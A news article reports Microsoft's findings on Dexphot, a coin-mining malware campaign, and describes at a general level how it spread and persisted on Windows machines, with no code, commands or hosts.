Image: Microsoft
Microsoft security engineers detailed today a new malware strain that has been infecting Windows computers since October 2018 to hijack their resources to mine cryptocurrency and generate revenue for the attackers.
Named Dexphot, this malware reached its peak in mid-June this year, when its botnet reached almost 80,000 infected computers.
Since then, the number of daily infections has been slowly going down, as Microsoft claims it deployed countermeasures to improve detections and stop attacks.
A complex malware strain for a mundane task
But while Doxphot’s end goal was banal, the methods and techniques for its modus operandi stood out due to their high level of complexity, something that Microsoft also noticed.
“Dexphot is not the type of attack that generates mainstream media attention,” said Hazel Kim, a malware analyst for the Microsoft Defender ATP Research Team, referring to the malware’s mundane task of mining cryptocurrency, rather than stealing user data.
“It’s one of the countless malware campaigns that are active at any given time. Its goal is a very common one in cybercriminal circles – to install a coin miner that silently steals computer resources and generates revenue for the attackers,” Kim said.
“Yet Dexphot exemplifies the level of complexity and rate of evolution of even everyday threats, intent on evading protections and motivated to fly under the radar for the prospect of profit.”
In a report shared with ZDNet that’s scheduled to go live later today, Kim details Dexphot’s advanced techniques, such as the use of fileless execution, polymorphic techniques, and smart and redundant boot persistence mechanisms.
Infection process
According to Microsoft, Dexphot is what security researchers call a second-stage payload — a type of malware that’s dropped on systems that are already infected by other malware.
In this case, Dexphot was being dropped on computers that were previously infected with ICLoader, a malware strain that’s usually side-installed as part of software bundles, without the user’s knowledge, or when users downloaded and installed cracked or pirated software.
On some of these ICLoader-infected systems, the ICLoader gang would download and run the Dexphot installer.
Microsoft says this installer would be the only part of the Dexphot malware that would be written to disk, but only for a short period of time. Every other Dexphot file or operation would use a technique known as fileless execution to run inside the computer’s memory only, making the malware’s presence on a system invisible to classic signature-based antivirus solutions.
Furthermore, Dexphot would also employ a technique called “living off the land” (or LOLbins) to (ab)use legitimate Windows processes to execute malicious code, rather than run its own executables and processes.
For example, Microsoft says Dexphot would regularly abuse msiexec.exe, unzip.exe, rundll32.exe, schtasks.exe, and powershell.exe, all legitimate apps that come pre-installed on Windows systems. By using these processes to start and run malicious code, Dexphot effectively became indistinguishable from other local apps that were allso using these Windows utilities to do their jobs.
Image: Microsoft
But Dexphot operators didn’t stop here. Because in recent years antivirus products have been using cloud-based systems to inventory and centralize patterns of malicious fileless execution and LOLbins abuse, Dexphot also employed a technique called polymorphism.
This technique refers to malware that constantly changes its artifacts. According to Microsoft, Dexphot operators changed the file names and URLs used in the infection process once every 20-30 minutes.
By the time an antivirus vendor would detect a pattern in Dexphot’s infection chain, that pattern would change, and allow the Dexphot gang to stay a step ahead of cyber-security products.
Multi-layered persistence mechanisms
But no malware stays undetected forever, and even in these cases, the Dexphot gang had planned ahead.
Microsoft says that Dexphot came with clever persistence mechanisms that would often re-infect systems that were not cleaned of all of the malware’s artifacts.
For the first, the malware used a technique called process hollowing to start two legitimate processes (svchost.exe and nslookup.exe), hollow their content, and run malicious code from within them.
Disguised as legitimate Windows processes, these two Dexphot components would keep an eye out that all the malware’s components were up and running, and reinstall the malware if one of them were stopped. Because there were two “monitoring” processes, even if system administrators or antivirus software removed one, the second would serve as a backup and re-infect the system later on.
Second, also working as a failsafe, Dexphot also used a series of scheduled tasks to make sure the victim is fileslessly reinfected after every reboot, or once every 90 or 110 minutes.
Because the tasks were scheduled to run at regular intervals, they also served as a way for the Dexphot gang to deliver updates to all infected systems.
According to Microsoft, every time one of these tasks ran, it downloaded a file from an attacker’s server, allowing the attacker to modify this file with updated instructions for all of the Dexphot infected hosts and update their entire botnet within hours after an antivirus vendor deployed any countermeasures.
Further, Microsoft says that polymorphism was also used for these tasks, with the Dexphot gang changing task names at regular intervals. This simple trick allowed the malware to skirt any blocklists that blocked scheduled tasks by their names.
As Microsoft’s Kim pointed out above, all of these techniques are terribly complicated. One would normally expect these types of redundancies to be found in the infection chains for malware developed by advanced government-backed hacking units.
However, in the last two years, these techniques have been slowly trickling down to cyber-criminal gangs, and are now pretty much a common occurrence in something as mundane as a crypto-currency mining operation like Dexphot, infostealers like Astaroth, or click-fraud operations like Nodersok.
